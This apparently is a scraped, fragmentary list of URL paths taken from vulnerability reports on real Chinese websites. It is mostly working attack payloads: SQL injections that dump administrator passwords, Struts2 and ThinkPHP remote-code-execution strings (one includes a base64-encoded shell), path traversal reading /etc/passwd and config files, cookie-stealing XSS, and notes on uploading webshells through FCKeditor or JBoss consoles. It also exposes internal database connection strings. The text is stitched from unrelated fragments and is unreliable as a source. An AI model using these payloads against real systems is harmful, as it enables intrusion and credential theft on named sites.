/goods/lists/53?filter%5B71%5D=%E7%94%B7%E5%A3%AB'and'1'='1 /goods/lists/53?filter%5B71%5D=%E7%94%B7%E5%A3%AB'and'1'='2 /manage/login.php /admin/index.php /admin/ /cgi-bin/gsps/v5/index.cgi /index2.php/home/viewforum/forum_id/11/sid/function.mysql-connect/40/page/function.include/ /index2.php/ www.shinewide.com www.shinewide.com /index.php?iaction=admin /Info.aspx?Guid=3e27e2be-e5d6-404a-b8e9-974dbd34f86c%27%20and%201=2%20union%20select%201,2,3,LoginID%20%2B%20%27|%27%20%2B%20pwd,5,6,7,8%20from%20Curcco_Login-- /admin/login.aspx /news_comment/ /t2.php?province=%BC%AA%C1%D6 /siteserver/installer/default.aspx /qiche11a36/wwwroot/admin/FCKeditor/editor/fckeditor.html /WEB-INF/config.xml /WEB-INF/ftpconfig/site.xml /web-services/services/ConfigBean /web-services/services/MembercenterBean /web-services/services/AuthorizBean /web-services/services/SiteChannelBean /web-services/services/SiteInfoBean /web-services/services/ProductBean /web-services/services/ContentBean /web-services/services/MembermoneyBean /web-services/services/MemberscoreBean /web-services/services/JobBean /web-services/services/ResumeBean /web-services/services/PublishBean /web-services/services/AdPlaceBean /web-services/services/UploadfileBean /web-services/ConfigBean?WSDL"/ /web-services/MemberBean?WSDL"/ /web-services/AuthorizBean?WSDL"/ /web-services/SiteChannelBean?WSDL"/ /web-services/SiteInfoBean?WSDL"/ /newsinarc/login.html /blogflag/admin/login.html /main.php?s=admin&a=login /iframe/login.php /auto/4s-admin/login.php /200704changcheng/admin/login.php?ccsForm=Login /main.php?s=admin&a=login /im?jsonp=parent.org.cometd.script._callback57&message=[{%22channel%22:%22/meta/connect%22%3E;%3Cimg%20src=e%20onerror=alert%281234%29%3E%22,%22connectionType%22:%22callback-polling%22,%22id%22:58,%22clientId%22:%221s1wcv8qe8ap74hddzu%22}]&1333160737516 /ddp.tar.gz /GB/content.php?nid=46 /game.aspx?code=1015盲注 sohu.com /css/.svn /info.php /user.php /test.sql /smallc.php?id=1%20and%201=2%20union%20select%201,concat%28user_name,0x7c,password%29,3,4%20from%20zoshow_adminuser /install.php /web.config /BC_addfunds.jsp /detail.php?itemid=21713 /index/business?c_b_sort=&c_b_area=&keyword=%E5%8C%97%% /index/business?c_b_sort=&c_b_area=&keyword=%E5%8C%97%% /ent-2003/editor/030620/030620-175366.html /admin /163.html /admin/ /upload.aspx /uploadfile.aspx /admin/ /nxbj/nxgjd/syzw.tar.gz /index.php?m=ability&c=index&a=lists&catid=2 / / 17173.com mysql_fetch_array() /wenwang/question/index.php vip.club.sohu.com/wenwang/question/include/dsn.php vip.club.sohu.com/wenwang/question/include/dsn.php vip.club.sohu.com/wenwang/question/include/dsn.php vip.club.sohu.com/wenwang/question/include/dsn.php vip.club.sohu.com/wenwang/question/include/dsn.php vip.club.sohu.com/wenwang/question/index.php vip.club.sohu.com/wenwang/question/index.php vip.club.sohu.com/wenwang/question/index.php /bbs/hangye/ php:126 tuan.pindao.com/db.sql tuan.pindao.com/.svn/entries style.xiu.com/robots.txt style.xiu.com/.bash_history /open.tar.gz /xqly/01.shtml board.news.17173.com/include/db.php board.news.17173.com/include/db.php /zt/ynz071015/index.shtml board.news.17173.com/include/db.php board.news.17173.com/include/db.php /leaveword/more.html board.news.17173.com/include/db.php board.news.17173.com/include/db.php /xqly/02.shtml /2010/12/sp1224/show.php Lost /2010/03/tl0316/index.php /2010/04/qnyh0401/index.php /2010/09/cqsn0901/show.php /2010/02/mhzx0209/mjoin.php /stock/blank/stockweekly10th.shtml /car/ajax/get_oiluse_info.php?subid=930 /upload.html /200909/jisi/data.php /main/Cgi/hdzq.php /main/Cgi/hdzq.php /order_pro_mody.asp?id=15746&ack=mody¤tpage=1072&Search_Domain_Name= www.dj894.com /wish_tree_others.php?id=9018 /.bash_history /speed_test.php.bak /repost/dort/ycTeLu88x?pos=zan&from=zan_testb&rl=0&st=3307 /repost/dort/被刷微博ID?pos=zan&from=zan_testb&rl=0&st=3307 /repost/dort/” /2004857.htm /ssl/download.php?path=aW1hZ2VzL2RsanluYi8yMDExLzAyLzEwL0VERTVDNDQzNzA2RTczRjhCOEE1MUIyOEQ4MUJBRjQ5LnBkZg== /download.html /chkuser.asp?jsoncallback=jQuery17103889010781044103_1333554006151&username=username&UserPassword=userpassword&cooklogin=0&t=1333554038560&_=1333554038566 /profile.asp?action=customerinfo1 /space-858582 /space-858582 /chkuser.asp?jsoncallback=jQuery17103889010781044103_1333554006151&username=username&UserPassword=userpassword&cooklogin=0&t=1333554038560&_=1333554038566 /mall/index.jsp /mall/fg/order/inputPhoneTobuy.jsp?productId=50v3&isMc=1&maketingCaseNo=300000818059%20&selectedColor=hg5r&huodong=%E8%B4%AD%E6%9C%BA%E9%80%81%E8%AF%9D%E8%B4%B9&dangci=500%E6%A1%A3&dangciId=4449&planCaseId=1029&gm_money=%C2%A50.1 / /left.jsp /cck.php?gid=281 /item.php?gid=312 /coremail/fcg/ldmsapp?funcid=readlett&sid=nAJcHTFziYRAMbTs&mid=1tbiEwEkBkV9AdrAoQAAsy%0A19%0A24%0A1&fid=1&ord=0&desc=1&start=0&fromsearch=1 /cgi/ldapapp?sid=nAJcHTFziYRAMbTs&tempname=options%2Frefuselist.htm&funcid=opuserattr&optype=set&refuselist=test%40test.com&update.x=1 /disservice.php?findid=9 /index.php?controller=flv&action=show&fid=4468%3C/u%3E /oauth/grant?client_id=cd271e3051444285b8a18f1211a095cd&redirect_uri=http://zone.ku6.com/u/17958620&response_type=token /u/17958620 /new4/messages/new@123****?id=127**** /test.php /space.php?uid=335465&do=blog&id=5932&fansid=1 /admin/frame.aspx / /FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/ /FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector /login.aspx /f/m?tn=bdFIL&z=1287559916&word=%D1%CC%BA%AE%CB%AE&day=1&ntn=banid&un=%D1%CC%BA%AE%CB%AE&fid=1882952&pn=1&expand=&pinf=1__ /activity/activity_110601_02.html /usr/local/apache2/htdocs/zendamf_remote/:/usr/local/php/lib/php /activity/activity_110601_01.html /usr/local/apache2/htdocs/zendamf_remote/:/usr/local/php/lib/php 100% /im-client/imclient/selfHelp.action /home.php /home.php php /vehweb/ vehweb,使用此系统的单位还是不少的。源码有 /search_engine/search_knowledge_engine.php?tag=1&title=&classid=0&type=0&gjss=0&page=0&key=%25 /cnc/ / /sxj/WEB-INF/log4j.properties /sxj/WEB-INF/web.xml /sxj/WEB-INF/classes/com/homophobic/fairy/qq/servlet/WapAppServlet.class /sxj/log/sxj.log /txglj/new_info.jsp?id=55&info_no=4529 /ict/pages/Browser.jsp?sort=1&file=%2Fopt%2Ftomcat%2Fwebapps%2Fict%2Fict%2Fpages%2Fmadman.jsp /admin/admin_login.php?action=login /(http://www.cnec24.com/),后台管理:http://www.cnfc24.com/manage/,用户名密码'or'='or'直接射入后台。上传文件部分未对后缀名进行限制和过滤,直接可得到shell,服务器权限设置较为松散,多数重要的更新补丁也没跟上 /hm-web/m/welcome/login /ques.php?id=120 http://http://v.vnet.mobi //news_details.asp?id=98 /sites_details.asp?areaid=1 /?p=1&m=/../../../../../../../../../etc/passwd /?p=24&m=search&keyword=aaa%2527%20union%20select%201,2,3,4,username,6,7,pwd,9,10,11,12,13%20from%20shl_user%23 /qq.html /1esqxW /developer/listen /app2/mb_post2.php /video/assemble.php?type=6 /default.aspx /activedeta.aspx?active_id=99 /gc/index.php/index/searchconsignment/act/$%7B@print(md5(admin))%7D /cgi-bin/mobile_update_mood / www.wps.cn /extend/zh_cn/9luCih4CiWMQQQXZQYAXFQX7XJAUUXZ8w7ygWi/jsp/icp/user/ /extend/zh_cn/9luCih4CiWMQQQXZQYAXFQX7XJAUUXZ8w7ygWi/jsp/icp/user/js/CVS/Root /extend/zh_cn/9luCih4CiWMQQQXZQYAXFQX7XJAUUXZ8w7ygWi/jsp/icp/user/js/CVS/Repository /extend/zh_cn/9luCih4CiWMQQQXZQYAXFQX7XJAUUXZ8w7ygWi/jsp/icp/user/user_form.jsp /extend/zh_cn/a0Wna8AnaJCQaQXOKeqNVi3z3d1i93dqd1lous/jsp/business/register/ /extend/zh_cn/a0Wna8AnaJCQaQXOKeqNVi3z3d1i93dqd1lous/jsp/算是邮箱系统根目录吧 /FCKeditor/editor/filemanager/connectors/test.html尝试上传x.asp /fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2Fasp.asp&NewFolderName=Test%20Folder,成功在/Upfile/upload/file/下建立asp.asp目录 /2624717231/9c7201af35000wrr.html /2624717231/9c7201af35000wrr.html /fckeditor/editor/filemanager/connectors/test.html /CodeAward/admin/awardPeopleRule.aspx /online-crowdtest/%2F34766_folder.jsp /online-crowdtest/%2F34769_2008.php /app/newsDetail.action?headtodetailId=853 /data/tj/cups_detail.php?id=19 /Showbody.asp?c_NewsID=10701 /Signer/css.asp /njzq/xwzx/xwzq_template.jsp?docId=2399312 /a.jpg /admin.php / /admanager/www /cetvossFront/login.action /cgi-bin/scenario/save_scenario_v6 expression /new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- /new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- /new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- /new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- /new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- /new/news/BaseInfo9.jsp?nav=1&stockCode=600001'%20and%20exists(select%20*%20from%20dual)-- /wish/gotoWish.action /wish/gotoWish.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exit%281%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /live/admin/index.php /1.php /111.php /1.php /adm/ /sys/login.html /xxx.jsp?id=xxx / /index.php/module/action/param1/${@phpinfo() /index.php/module/action/param1/${@eval%28$_POST[f]%29 / /cs/index.html /specapp/index.php/module/action/param1/${@phpinfo() /specapp/index.php/module/action/param1/${@eval%28$_POST[f]%29 /fahao/index.php?c=xin&m=content&accid=905 / /photograph/loginManage.do /ddedu/website/index.jsp /ddedu/website/index.jsp /Login.action /web/admin/index.jsp /login.php / / / /photograph/mainphoto_cut.jsp?gender=0&fromDate=2010-07-23&toDate=2010-07-24 /photograph/user_photos.jsp?userID=用户ID /admin/login.aspx /admin/login.aspx /admin/login.aspx /admin/login.aspx /admin/login.aspx /pub/ /login_list_goto_0.html?gname=%EF%BF%BD%EF%BF%BD%D2%B5%EF%BF%BD%EF%BF%BD%EF%BF%BD /h/1/236/aaa/$%7B@print_r($_SERVER)%7D /h/1/236/aaa/$%7B@print(get_cfg_var('disable_functions'))%7D /h/1/236/aaa/$%7B@eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKEVfQUxMKTskaGFuZGxlID0gcG9wZW4oJy9iaW4vc2ggLWMgJy4iJyRfUE9TVFt4XSciLicgMj4mMScsICdyJyk7ZWNobyAiJyRoYW5kbGUnOyAiIC4gZ2V0dHlwZSgkaGFuZGxlKSAuICJcbiI7JHJlYWQgPSBmcmVhZCgkaGFuZGxlLCAyMDk2KTtlY2hvICRyZWFkO3BjbG9zZSgkaGFuZGxlKTtkaWUoKTs'))%7D /web-console/ /trafficpolice/Yee/MessageInfo.aspx?xx_id=2012000003 cn:3307 cn:3307 /usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin /Code/Python/Python-2.6.7/3rd/site-packages/jinja2 special externals needs-lock /exec/pic_index.php?id=zhaozhenglong123 /modules.php?qp=1&name=zbpd&op=ybs&id=23&fid=3734 /?i=2410 /home /themes /plugins /config /core /index.php/index/index/1/$%7B$%7Bphpinfo()%7D%7D /?m=file&a=jump_to_s3&uid=UID&fid=FID cg_ProductShow.asp www.xxx.com/xx.asp?xx=xx / /act/cgi/mother/md?uid=1464029310 /tuanadmin /cgi-bin/qzshare/cgi_qzshare_urlcheck?url= /cgi-bin/qzshare/cgi_qzshare_urlcheck?appid=503&rappid=2&url= /cgi-bin/qzshare/cgi_qzshare_urlcheck?url=http%3A%2F%2Fwww.wooyun.org%2F www.zjump.cn /cgi-bin/qzshare/cgi_qzshare_urlcheck?appid=503&rappid=2&url=http%3A%2F%2Fwww.wooyun.org%2F /user/user.shtml /ad_manage.php /cgi-bin/custom/modify_custom_window.cgi,这个页面是用来修改QQ空间模块内容的。这里我选择提交的是FLASH模块。 title title swf /ac/c.gif.swf /ac/c.gif.swf /ac/c.gif.swf /qzone/v6/accessory/plugin/zoom.swf?onchange=QZONE.frontPageAccessory.zoomDetect.onZoomChange /qzone/v6/accessory/plugin/zoom.swf?onchange=alert /qzone/v6/accessory/plugin/zoom.swf?onchange=alert title title swf /ac/c.gif.swf\ /em/ /bin:/usr/sbin:/usr/bin /index.php /xqc/mlpxyy/mlpxcx_info.php?tid=1315967 /xqc/mlpxyy/mlpxqx.php / /cps/site/newweb/foreground/ /cps/site/newweb/ /cps/site/newweb/foreground/show1.php?id=1 / /robots.txt /jsp/fgsjj/detail_4_dd.jsp?id=101 /main/%BA%C3%B3%B52%CE%C4%BC%FE/ /search/yonex/?s=1 /index.php?act=show_store&id=2032&stc_id=9048 /web/weblogin.do?returnUrl=http://ln.vnet.cn//login.xhtml?action=login&debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('netstat') /web/weblogin.do?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('netstat') /web/consume.do?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('netstat') /getMovieTrailer.xhtml?source=movie&mid=15800&channel=movie&callback=jsonp1334140128199 /guanggao/ad_tot.jsp?lid=10546%27%20AnD%20%27a%27%3d%27a&aid=vnet0101 /search.xhtml?crumb=1334140122040&name=%%27%20AnD%20%27%%27%3d%27&cid=-1 8080,用户名密码都是默认,直接上传war文件即可。 /用户名/profile /archives/167 /jmx-console /你的WAR包名字/你的马名字.jsp就可以了,一般权限很高哦 pijiu /admin/Session.asp /shop pijiu /search_flash.php?keyword=%E7%A9%8D%E6%9C%A8 /Scal.WebMaster/FileUpLoad/ /Customer/GetPassword.aspx /view/c587a8bd1a37f111f1855bf5.html /view/6a104f350b4c2e3f57276316.html /account/login?auth_str=值&url=http%253A%252F%252Fwww.dajie.com%252Fcard%252Fmaybeknow%253Ftrk%253Dforward / /wallpapers.php?id=downloads/wallpapers/ghostrider_wp02_standard.jpg / /test.txt uctest.ucweb.com /my_navi/manager/mynavclient/showmynav.php /discuzx2/ /wml/Download/uploadlimited/wap_camera.xhtml(文件上传漏洞) /json/ajax_get_mytaobao_try_item.htm?sexType=&callBack= /LDJAPP/zcfg/downloadfile.jsp?dest=201108050946274210.doc&src=附件一2011食品制造图表.doc /LDJAPP/zcfg/downloadfile.jsp?dest=aa/../201108050946274210.doc&src=附件一2011食品制造图表.doc /LDJAPP/zcfg/downloadfile.jsp?dest=../../WEB-INF/web.xml&src=web.xml /fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector /LDJAPP/zcfg/downloadfile.jsp?dest=../../search/ddyy/index.jsp&src=index.jsp /LDJAPP/zcfg/downloadfile.jsp?dest=../../WEB-INF/classes/com/trs/ldj/DBobj.class&src=DBobj.class /LDJAPP/zcfg/downloadfile.jsp?dest=../../WEB-INF/classes/com/trs/ldj/DatabaseConfig.properties&src=DatabaseConfig.properties oracle:thin:@192.168.1.202:1521:oracle /LDJAPP/zcfg/downloadfile.jsp?dest=../../search/ddyy/ddyy_01_outline.jsp&src=ddyy_01_outline.jsp /csibiz/csirp/guest/entprereg/login.jsp而该站点与下载点似乎不是一个站点,无法下载到其源代码 /LDJAPP/zcfg/downloadfile.jsp?dest=../../zcfg/downloadfile.jsp&src=downloadfile.jsp /fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector数据包,发现其实最终数据也是post到上面的.class类中。 www.bjld.gov.cn站点的Fckeditor路径即可 /LDJAPP//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=file&CurrentFolder=/页面使用post请求上传文件即可。就简单用php写了一个小代码实现,选择一个文件,就会向指定的url中上传选择的文件,这样做主要是为了方便下次遇到在使用,所谓磨刀不误砍柴工。再者好久没有写代码了,当锻炼一下,否则有些太生疏了。 oracle:thin:@192.168.1.202:1521:oracle oracle:thin:@192.168.1.21:1521:oracle jtds:sqlserver://192.168.1.37:1433/middledata /forum-3206-thread-15301334835859518-1-1.html /forum-291-thread-18701334837491991-1-1.html /club/2010/lottery/jsonbaby.php?callback=?test /haodian/list/business?categoryId=1®ionId=0&address="/ /zhizhao/editlistyn2.asp?id=77 /pro_idc_fwqzy.php?t=1 /upload/201105162257279.asa / /index.php?doc-summary-xxxxxxxxx%27%20and%201=2%20union%20select%201,2,3,4,5,concat%28username,0x7c,password%29,7,8,9,0,1,2,3,4,5,6,7,8,9,0%20from%20wiki_user%20where%20groupid=4%23 /config/mobileconfig/index /gmis/xkjsb/dskyinfo/dskyInfoBs1.aspx?id=1 /gmis/dsphoto/1.asp /11.html?11 /11.html?11 /cgi-bin/bbs/author.cgi?author=test /cgi-bin/experience/exp_active_email?key=test&uid=test /item.htm?id=16868484866 /json/select_city.htm?callback=B"/ /sug?area=etao&code=utf-8&callback="/ /pc/ksf/getSnsCoin.do?callback=test /mob //mob /index.html?do=regsuccess&time=DH=kz-mid04&desturl=http://safddasdewq.3322.org/64?id=qwe /qyywx.php?news_id=50%20and%201=2%20union%20select%201,2,user(),database(),5,6,7,8,9,version(),11,12 /app/friend/#/a/search/user/search/find.do?_input_encode=UTF-8&nick=xsser /a/register/passport/getNicks?callback=test /a/checkpassword/checkPassword?xpt=&vn=test /a/assistant/personal/get?xpt=&_=&vn= /a/app/discuss/newcount.htm?cb="/ /guest/count/count.do?type=0&xpt=&callback= /blogcount?l=1&vn= /page/category.do?action=recmdWidget&st=0&sz=15&vn= /app/friend/#/a/search/user/search/find.do?type=4&employer=%22/%3E%3Cscript%3Ealert%28/goderci/%29%3C/script%3E&_input_encode=UTF-8 /push_mail.jsp?b=126"/ /push_mail.jsp?b=126%22/%3E%3C/script%3E%3Cscript%3Ealert%28/goderci/%29%3C/script%3E&t=0 /push_mail.jsp?b=126"/ Announcement.asp?AnnounceId= /manager/index.php- /manager/login.php /ec/ /cgi-bin/weibotrip/trip.cgi?traveler=20 /cgi-bin/nw/photo/main.cgi?action=list&cat=480 /bison/commons/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/jsp/connector biz.weibo.com/adfront/deliver?psid=PDPS000000037700&wbVersion=v4w&uid=1763365093&callback= cnzz.cc/1.txt /BGMobileSrv/api/getOrderDetail.do?weblogId=96a116f69c7a6b644f4bc4d269bb4d3b%3AgRzVP&isHistory=0&terNo=000000000000000310260000000000&orderSn=120423405125 www.sina.com.tw /Search.shtml?cid=1&dis=[0-9.5]&ad=155%20order%20by%2017%23 /Search.shtml?cid=1&dis=[0-9.5]&ad=155%20and%201=2%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%23 /Child/playerlist.shtml?sort= /Ad/getAdPosListJs.shtml?position=175 /Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,user%28%29%23 /Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,concat%28user_id,0x7c,user_name,0x7c,%20email,0x7c,password%29%20from%20system_admin_user%23 /Ad/getAdPosListJs.shtml?position=175%29%20and%201=2%20union%20select%201,2,concat%28user_id,0x7c,email,0x7c,%20user_name,0x7c,password%29%20from%20user_users%20where%20user_name%20like%200x616161616161616263%20limit%201%23 /cgi-bin/profile/view.cgi?id=101459 /cgi-bin/wc2010/nw/photo/main.cgi?cat=1683 /cgi-bin/subject.cgi?id=3 /cgi-bin/vote/index.cgi?cat=1 /cgi-bin/live/index.cgi?id=4740646 /cgi-bin/movie/mv/main.cgi?id=3515 /cgi-bin/vote/index.cgi?cat=1 /event/event.php?k=1 /joy?farm=1 /ebill/ajax/zoomElecBill.action?orgId=000000000000000&billId=000000000000 /fang/activities/getLotteryInfo.html?callback= /remote/citySearch.do?&callback={callback}&q=11111 /baidu/s?wd=%B8%EA%D1%C5%C9%F8%CD%B8%C2%DB%CC%B3&rsv_bp=0&inputT=6390 /poem/index.php?_c=admin&_a=list&type=poetry var /Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23 /Goods/comments?good_id=556375&user_id=luj8848&order=%28case%0Awhen%281=1%29%0Athen%0Aadd_time%0Aelse%0Ais_help%0Aend%29%23 /Ajax/adCodeInfo?time=0.7242165785281457&callback=jsonp1335235877318&adposid=175 /admin/adminMain.do /admin/login.php /admin/login.html /cgi-bin/admin/boardadmin/group_limit_list?groupid=20023&type=0&desc=0 /admin/ /barFindteBar.do /comment.php?id=962654 /list/positionList.php?positionId=791 /cio/list/positionList.php?positionId=806 /list/positionList.php?positionId=789 /list/positionList.php?positionId=790 /list/positionList.php?positionId=794 /list/node/index.php?nodeId=415 /list/list.php?nodeId=1801 /list/diy/index.php?nodeIdLevel2=267 /ucHome/space.php?do=mtag&tagid=3 /index.php/Content/detail/id/{${passthru($_GET[c])}}?c=id;uname /poem/index.php?_c=admin&_a=create&type=poetics /xiaoyi/survey.php?issubmit=3&pj=faq&u=http://help.163.com/special/sp/wlps_tips01.html&c=1&r=%E9%9D%9E%E5%B8%B8%E6%BB%A1%E6%84%8F /bugs/wooyun-2010-06130/trace/40c4cd8210b792d4b99811af4bfbe76e /test/ /club/list.action /info.php /s-hl1w6sgwpq3jv6gxk3tz23ovrtxc835spuv1h25mi6xw2o5wpq3jv6gxk2--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html /5565117/0-0000000000-0-1-1-0-3-0-0-0/Ii8+PC9zY3JpcHQ+PHNjcmlwdD5hbGVydCgvZ29kZXJjaS8pPC9zY3JpcHQ+Xi0xXi0x/index.shtml /portal.php?byref=1&g_tk=1772478199&g_ty=lk&byref=1 www.17wo.com /LookMore.action这个路径下面 /manasys/aa /manasys/UserAdd /flash_upload.php?modelid=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%28username,0x7c,password%29%20from%20trx_member%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 /more.php?class_id=39 /more.php?class_id=39%20and%201=2%20UNION%20SELECT%201,2,3,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29-- /.svn/entries / /ab.js /proxy%20v4.0/ /mstmap50007/g_adv_loc.jsp?cname=123&&curl=http://2651055qq.in/c10 /c10 www.118114.cn)注册登录之后,在用户资料--补充资料--头像上传, / /index.php?app=star&mod=Index&act=detail&s=66 /index.php?app=star&mod=Index&act=detail&s=66 /vipcenter/?src_key=myjy_lookedme&from=vipcenter-1″ /a8/ed/a72f543c8127e155728a0330609f/avatar_p.jpg” /a8/ed/a72f543c8127e155728a0330609f/avatar_p.jpg /反解出来的Id来进入妹子空间。 /反解出来的UId即可 /jiayuan/index.php?key=taylortai /include/fckeditor/editor/fckeditor.html /images/down.jpg/1.php /admin/admin.asp/ /see/view_point_detail/?task_ /seeQ/review_index/?taskid=23174&check_type= www.luckyair.net /cn/中国气象局国家气候中心存在SQL注入 /Website/index.php?ChannelID=3%20and%201=2%20union%20select%201,2,3,4,5-- /Website/index.php?ChannelID=3 /NewsCenter/NewsFile/News201204261832540.php /thread-2744369-1-1.html /user.php?act=act_login&username=xxxxx&back_url=http://shop.wanmei.com/goods.php?id=185 /config/ /lcExpertRegForm.xhtml?method=initReg /lcExpertRegForm.xhtml?method=initReg /zhuanti/comment/?ztid=44'&s=1 /zhuanti/comment/?ztid=44'&s=1 /search.php?searchType=&keyWords=%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sid= /zhuanti/comment/?ztid=44&s= /dll/.svn/entries /?id=10328 /lib/ /demo/ /phpMyAdmin/ /lib/FCKeditor/editor/filemanager/browser/default/browser.html /wiki/imap/extensions/FCKeditor/fckeditor/editor/fckeditor.html /myinfo_unlogin.aspx /controls/fckeditor/ /dmwzweb/customer/successcase.aspx /i?tn=baiduimagedetail&ct=503316480&cl=2&lm=-1&istype=2&fr=ml2&pv=&ic=0&z=0&fmq=m11&s=0&word=流氓兔 /admin/login /joinus.php?id=56注入 /v/list.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exit%280%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /ptpRegisterAndLogin_add.action?%28%27\u0023_memberAccess[\%27allowStaticMethodAccess\%27]%27%29%28meh%29=true&%28aaa%29%28%28%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003d\u0023foo%27%29%28\u0023foo\u003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27\u0023rt.exit%281%29%27%29%28\u0023rt\u003d@java.lang.Runtime@getRuntime%28%29%29%29=1 /html/114/56731.html /)存在上传漏洞和目录遍历漏洞 /favicon/ /icbc/perbank/regtip.jsp@www.sina.com.cn/">http://www.icbc.com.cn/</a> www.sina.com(如果是钓鱼地址呢……) /lec/search?word= /search/none?word="/ /sanya/search/?wd="/ /bj/cklog.php?callback=baidu_s"/ /southservtudou.sql /specapp/Examples/examples.sql /specapp/Examples/Rbac/index.php/Public/login /specapp/Examples/Autoindex/index.php/Index/checkEnv/ /specapp/Examples/Form/ /specapp/Examples/Validate/ /specapp/Examples/Ajax/ /specapp/Examples/Page/ /specapp/Examples/CURD/ /specapp/Examples/Trace/ /specapp/Examples/Time/ /specapp/Examples/Db/ /specapp/Examples/Cache/ /specapp/Examples/Log/ /specapp/Examples/Log/ /specapp/Examples/Debug/ /specapp/Examples/File/ /specapp/Examples/View/ /specapp/Examples/Relation/ /specapp/Examples/Blog/ /tudou_api/ /mysql/ /cgi-bin/fillBill?sid=3&subject_id=aabbbb&embed=aaaaaaaaaa%22%3E%3Cscript%3Ealert%28document.cookie%29;openLogin%28%27http%3A%2F%2Fkf.qq.com%2F%27%29%3C/script%3E%3C!-- /.svn/entries /svn/websearch4/metazhidao/metazhidao_front/tags/apache.zhishi.20120306.a /svn/websearch4 1.0.250-top.baidu.com/zcache/zczche_adapter.class.php /detail.php?b=7&w=%BD%F5%D2%C2%D2%B9%D0%D0 /.svn/entries /chinaunix/trunk/code/china_gbk /chinaunix /chinaunix /chinaunix /chinaunix /chinaunix www.tenpay.com\/v2\// /admin/template/uploadFile.jsp / /uploadfile/virusup/diy.asp/20120428221403412.zip /so/q_%E5%92%B8%E9%B1%BC%22%3E%3Ciframe%20name="mypage"%20width=900px%20height=600px%20src="http://www.baidu.com /url?sa=t&rct=j&q=code+by+4lert&source=web&cd=6&ved=0CEYQFjAF&url=http%3A%2F%2Fsfda.qingdao.gov.cn%2Fdirectory%2Fweb%2FWS08%2Fimages%2F1276453391015.jsp&ei=qJWcT8_FJfGUiQeBg6XDDg&usg=AFQjCNEDw2DUuX1reg-0-hJjRsgSYgA9zA /directory/web/WS08/images/1276453391015.jsp cgi.meigui.qq.com /分站可直接写入一句话并连接成功 /ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8 /ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8 /i/sys/jump?un=hacker /house/web/Search_Result.php newhousesh.test.soufun.com/house/include/SystemDriver/MssqlDriver.php newhousesh.test.soufun.com/house/include/SystemDriver/MssqlDriver.php newhousesh.test.soufun.com/house/include/SystemDriver/MssqlDriver.php /admin/img/style/Style.css/1.php /admin/images/welcomebg.gif/1.php /market/zhongjie/admin/index.htm /account/verify_user.htm?param=D1DDE852C5863B3553&type=forgot_pwd /World.WebUI/DataModule/SendCheckCode.ashx?phone=你的手机号 /var/www/dede/member /register/gotoemail.php?email=xb@usa.com / //member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@ //member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@ /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post /lol/images_m/php/get_image.php?file=a.gif ifeng.com /commodity/ /index.php?sid=39591&lang=index.ph /s.htm?word=%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E /cbportal/userprofile/getSmsVeriCode.htm?userid=""&username=""&mobile=""&veriCode= /ajax/ajax_order.php?type=send_authcode&mobile=你手机号码 /umpay/manage/index.htm 